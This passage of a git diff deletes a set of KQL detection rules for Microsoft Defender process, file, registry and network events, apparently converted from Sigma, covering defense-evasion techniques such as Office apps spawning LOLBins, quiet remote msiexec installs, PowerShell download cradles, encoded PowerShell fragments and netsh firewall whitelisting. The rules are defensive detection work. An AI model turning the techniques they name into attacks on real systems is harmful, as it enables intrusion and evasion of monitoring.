Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) -// Tags: attack.defense_evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010 -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql b/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql deleted file mode 100644 index 271488d2..00000000 --- a/Defense Evasion/Suspicious_Msbuild_Execution_By_Uncommon_Parent_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/11/17 -// Level: medium -// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\MSBuild.exe" or ProcessVersionInfoOriginalFileName =~ "MSBuild.exe") and (not((InitiatingProcessFolderPath endswith "\\devenv.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\python.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\nuget.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql b/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql deleted file mode 100644 index 4facc676..00000000 --- a/Defense Evasion/Suspicious_MsiExec_Embedding_Parent.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/16 -// Level: medium -// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads -// Tags: attack.t1218.007, attack.defense_evasion -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") and (InitiatingProcessCommandLine contains "MsiExec.exe" and InitiatingProcessCommandLine contains "-Embedding ")) and (not(((ProcessCommandLine contains "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" and FolderPath endswith ":\\Windows\\System32\\cmd.exe") or (ProcessCommandLine contains "\\DismFoDInstall.cmd" or (InitiatingProcessCommandLine contains "\\MsiExec.exe -Embedding " and InitiatingProcessCommandLine contains "Global\\MSI0000"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql b/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql deleted file mode 100644 index 367b993a..00000000 --- a/Defense Evasion/Suspicious_Msiexec_Execute_Arbitrary_DLL.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/01/16 -// Level: medium -// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. -Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) - -// Tags: attack.defense_evasion, attack.t1218.007 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -y" or ProcessCommandLine contains " /y") and FolderPath endswith "\\msiexec.exe") and (not((ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" /Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" /Y C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Bonjour\\mdnsNSP.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\ScriptingObjectModel.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdateAdmin.dll" or ProcessCommandLine contains "\\MsiExec.exe\" -Y \"C:\\Windows\\CCM\\" or ProcessCommandLine contains "\\MsiExec.exe\" -Y C:\\Windows\\CCM\\"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql b/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql deleted file mode 100644 index e611a0b5..00000000 --- a/Defense Evasion/Suspicious_Msiexec_Quiet_Install_From_Remote_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/28 -// Level: medium -// Description: Detects usage of Msiexec.exe to install packages hosted remotely quietly -// Tags: attack.defense_evasion, attack.t1218.007 -DeviceProcessEvents -| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q") and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql b/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql deleted file mode 100644 index 6b585da4..00000000 --- a/Defense Evasion/Suspicious_Network_Connection_Binary_No_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/03 -// Level: high -// Description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters -// Tags: attack.defense_evasion -DeviceNetworkEvents -| where ((InitiatingProcessCommandLine endswith "\\regsvr32.exe" or InitiatingProcessCommandLine endswith "\\rundll32.exe" or InitiatingProcessCommandLine endswith "\\dllhost.exe") and (InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe")) and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine)))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql b/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql deleted file mode 100644 index 9f1cde1d..00000000 --- a/Defense Evasion/Suspicious_Obfuscated_PowerShell_Code.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/07/11 -// Level: high -// Description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "IAAtAGIAeABvAHIAIAAwAHgA" or ProcessCommandLine contains "AALQBiAHgAbwByACAAMAB4A" or ProcessCommandLine contains "gAC0AYgB4AG8AcgAgADAAeA" or ProcessCommandLine contains "AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg" or ProcessCommandLine contains "AuAEkAbgB2AG8AawBlACgAKQAgAHwAI" or ProcessCommandLine contains "ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACIAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAiACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AIgAgAC0AZgAg" or ProcessCommandLine contains "AHsAMQB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADEAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAxAH0AewAwAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMAB9AHsAMwB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADAAfQB7ADMAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAwAH0AewAzAH0AJwAgAC0AZgAg" or ProcessCommandLine contains "AHsAMgB9AHsAMAB9ACcAIAAtAGYAI" or ProcessCommandLine contains "B7ADIAfQB7ADAAfQAnACAALQBmAC" or ProcessCommandLine contains "AewAyAH0AewAwAH0AJwAgAC0AZgAg" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql b/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql deleted file mode 100644 index 5bad9e78..00000000 --- a/Defense Evasion/Suspicious_PROCEXP152.sys_File_Created_In_TMP.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: xknow (@xknow_infosec), xorxes (@xor_xes) -// Date: 2019/04/08 -// Level: medium -// Description: Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. -This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU. - -// Tags: attack.t1562.001, attack.defense_evasion -DeviceFileEvents -| where (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "PROCEXP152.sys") and (not((InitiatingProcessFolderPath contains "\\procexp64.exe" or InitiatingProcessFolderPath contains "\\procexp.exe" or InitiatingProcessFolderPath contains "\\procmon64.exe" or InitiatingProcessFolderPath contains "\\procmon.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql b/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql deleted file mode 100644 index 3d30e123..00000000 --- a/Defense Evasion/Suspicious_Parent_Double_Extension_File_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/06 -// Level: high -// Description: Detect execution of suspicious double extension files in ParentCommandLine -// Tags: attack.defense_evasion, attack.t1036.007 -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith ".doc.lnk" or InitiatingProcessFolderPath endswith ".docx.lnk" or InitiatingProcessFolderPath endswith ".xls.lnk" or InitiatingProcessFolderPath endswith ".xlsx.lnk" or InitiatingProcessFolderPath endswith ".ppt.lnk" or InitiatingProcessFolderPath endswith ".pptx.lnk" or InitiatingProcessFolderPath endswith ".rtf.lnk" or InitiatingProcessFolderPath endswith ".pdf.lnk" or InitiatingProcessFolderPath endswith ".txt.lnk" or InitiatingProcessFolderPath endswith ".doc.js" or InitiatingProcessFolderPath endswith ".docx.js" or InitiatingProcessFolderPath endswith ".xls.js" or InitiatingProcessFolderPath endswith ".xlsx.js" or InitiatingProcessFolderPath endswith ".ppt.js" or InitiatingProcessFolderPath endswith ".pptx.js" or InitiatingProcessFolderPath endswith ".rtf.js" or InitiatingProcessFolderPath endswith ".pdf.js" or InitiatingProcessFolderPath endswith ".txt.js") or (InitiatingProcessCommandLine contains ".doc.lnk" or InitiatingProcessCommandLine contains ".docx.lnk" or InitiatingProcessCommandLine contains ".xls.lnk" or InitiatingProcessCommandLine contains ".xlsx.lnk" or InitiatingProcessCommandLine contains ".ppt.lnk" or InitiatingProcessCommandLine contains ".pptx.lnk" or InitiatingProcessCommandLine contains ".rtf.lnk" or InitiatingProcessCommandLine contains ".pdf.lnk" or InitiatingProcessCommandLine contains ".txt.lnk" or InitiatingProcessCommandLine contains ".doc.js" or InitiatingProcessCommandLine contains ".docx.js" or InitiatingProcessCommandLine contains ".xls.js" or InitiatingProcessCommandLine contains ".xlsx.js" or InitiatingProcessCommandLine contains ".ppt.js" or InitiatingProcessCommandLine contains ".pptx.js" or InitiatingProcessCommandLine contains ".rtf.js" or InitiatingProcessCommandLine contains ".pdf.js" or InitiatingProcessCommandLine contains ".txt.js") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql b/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql deleted file mode 100644 index 539f1c04..00000000 --- a/Defense Evasion/Suspicious_Path_In_Keyboard_Layout_IME_File_Registry_Value.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/11/21 -// Level: high -// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. -Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. -IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. - -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where (RegistryKey contains "\\Control\\Keyboard Layouts" and RegistryKey contains "Ime File") and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql b/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql deleted file mode 100644 index aeaaf597..00000000 --- a/Defense Evasion/Suspicious_PowerShell_Invocations_-_Specific_-_ProcessCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/05 -// Level: medium -// Description: Detects suspicious PowerShell invocation command parameters -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ((ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "[Convert]::FromBase64String") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-ep" and ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-Enc") or (ProcessCommandLine contains " -w " and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "-noni" and ProcessCommandLine contains "-nop" and ProcessCommandLine contains " -c " and ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object") or (ProcessCommandLine contains "iex" and ProcessCommandLine contains "New-Object" and ProcessCommandLine contains "Net.WebClient" and ProcessCommandLine contains ".Download") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "\\software\\") or (ProcessCommandLine contains "bypass" and ProcessCommandLine contains "-noprofile" and ProcessCommandLine contains "-windowstyle" and ProcessCommandLine contains "hidden" and ProcessCommandLine contains "new-object" and ProcessCommandLine contains "system.net.webclient" and ProcessCommandLine contains ".download")) and (not((ProcessCommandLine contains "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1" or ProcessCommandLine contains "Write-ChocolateyWarning"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql b/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql deleted file mode 100644 index c2209f70..00000000 --- a/Defense Evasion/Suspicious_Powercfg_Execution_To_Change_Lock_Screen_Timeout.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/11/18 -// Level: medium -// Description: Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\powercfg.exe" or ProcessVersionInfoOriginalFileName =~ "PowerCfg.exe") and ((ProcessCommandLine contains "/setacvalueindex " and ProcessCommandLine contains "SCHEME_CURRENT" and ProcessCommandLine contains "SUB_VIDEO" and ProcessCommandLine contains "VIDEOCONLOCK") or (ProcessCommandLine contains "-change " and ProcessCommandLine contains "-standby-timeout-")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql b/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql deleted file mode 100644 index 317441d1..00000000 --- a/Defense Evasion/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/07/12 -// Level: high -// Description: Detects process execution from a fake recycle bin folder, often used to avoid security solution. -// Tags: attack.persistence, attack.defense_evasion -DeviceProcessEvents -| where FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Process_Parents.kql b/Defense Evasion/Suspicious_Process_Parents.kql deleted file mode 100644 index f2a0aaef..00000000 --- a/Defense Evasion/Suspicious_Process_Parents.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/21 -// Level: high -// Description: Detects suspicious parent processes that should not have any children or should only have a single possible child program -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\minesweeper.exe" or InitiatingProcessFolderPath endswith "\\winver.exe" or InitiatingProcessFolderPath endswith "\\bitsadmin.exe") or ((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\eventvwr.exe" or InitiatingProcessFolderPath endswith "\\calc.exe" or InitiatingProcessFolderPath endswith "\\notepad.exe") and (not((isnull(FolderPath) or (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\mmc.exe" or FolderPath endswith "\\win32calc.exe" or FolderPath endswith "\\notepad.exe"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Process_Start_Locations.kql b/Defense Evasion/Suspicious_Process_Start_Locations.kql deleted file mode 100644 index 3bd09343..00000000 --- a/Defense Evasion/Suspicious_Process_Start_Locations.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: juju4, Jonhnathan Ribeiro, oscd.community -// Date: 2019/01/16 -// Level: medium -// Description: Detects suspicious process run from unusual locations -// Tags: attack.defense_evasion, attack.t1036, car.2013-05-002 -DeviceProcessEvents -| where (FolderPath contains ":\\RECYCLER\\" or FolderPath contains ":\\SystemVolumeInformation\\") or (FolderPath startswith "C:\\Windows\\Tasks\\" or FolderPath startswith "C:\\Windows\\debug\\" or FolderPath startswith "C:\\Windows\\fonts\\" or FolderPath startswith "C:\\Windows\\help\\" or FolderPath startswith "C:\\Windows\\drivers\\" or FolderPath startswith "C:\\Windows\\addins\\" or FolderPath startswith "C:\\Windows\\cursors\\" or FolderPath startswith "C:\\Windows\\system32\\tasks\\") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql b/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql deleted file mode 100644 index f47e40f1..00000000 --- a/Defense Evasion/Suspicious_Program_Location_Whitelisted_In_Firewall_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community -// Date: 2020/05/25 -// Level: high -// Description: Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall -// Tags: attack.defense_evasion, attack.t1562.004 -DeviceProcessEvents -| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "allowedprogram") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "add" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "action=allow" and ProcessCommandLine contains "program=")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and (ProcessCommandLine contains ":\\$Recycle.bin\\" or ProcessCommandLine contains ":\\RECYCLER.BIN\\" or ProcessCommandLine contains ":\\RECYCLERS.BIN\\" or ProcessCommandLine contains ":\\SystemVolumeInformation\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Desktop\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\addins\\" or ProcessCommandLine contains ":\\Windows\\cursors\\" or ProcessCommandLine contains ":\\Windows\\debug\\" or ProcessCommandLine contains ":\\Windows\\drivers\\" or ProcessCommandLine contains ":\\Windows\\fonts\\" or ProcessCommandLine contains ":\\Windows\\help\\" or ProcessCommandLine contains ":\\Windows\\system32\\tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Local Settings\\Temporary Internet Files\\" or ProcessCommandLine contains "\\Temporary Internet Files\\Content.Outlook\\" or ProcessCommandLine contains "%Public%\\" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql b/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql deleted file mode 100644 index 85a9b22b..00000000 --- a/Defense Evasion/Suspicious_Provlaunch.EXE_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/08 -// Level: high -// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")) and InitiatingProcessFolderPath endswith "\\provlaunch.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_RASdial_Activity.kql b/Defense Evasion/Suspicious_RASdial_Activity.kql deleted file mode 100644 index 4e30f528..00000000 --- a/Defense Evasion/Suspicious_RASdial_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: juju4 -// Date: 2019/01/16 -// Level: medium -// Description: Detects suspicious process related to rasdial.exe -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where FolderPath endswith "rasdial.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Recursive_Takeown.kql b/Defense Evasion/Suspicious_Recursive_Takeown.kql deleted file mode 100644 index 505ce3d4..00000000 --- a/Defense Evasion/Suspicious_Recursive_Takeown.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/30 -// Level: medium -// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders -// Tags: attack.defense_evasion, attack.t1222.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "/f " and ProcessCommandLine contains "/r") and FolderPath endswith "\\takeown.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql b/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql deleted file mode 100644 index e5f98406..00000000 --- a/Defense Evasion/Suspicious_Registry_Modification_From_ADS_Via_Regini.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Eli Salem, Sander Wiebing, oscd.community -// Date: 2020/10/12 -// Level: high -// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. -// Tags: attack.t1112, attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and ProcessCommandLine matches regex ":[^ \\\\]" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql b/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql deleted file mode 100644 index 57c97c53..00000000 --- a/Defense Evasion/Suspicious_Regsvr32_Execution_From_Remote_Share.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/31 -// Level: high -// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares -// Tags: attack.defense_evasion, attack.t1218.010 -DeviceProcessEvents -| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql b/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql deleted file mode 100644 index 46923deb..00000000 --- a/Defense Evasion/Suspicious_Response_File_Execution_Via_Odbcconf.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/22 -// Level: high -// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. -// Tags: attack.defense_evasion, attack.t1218.008 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not((ProcessCommandLine contains 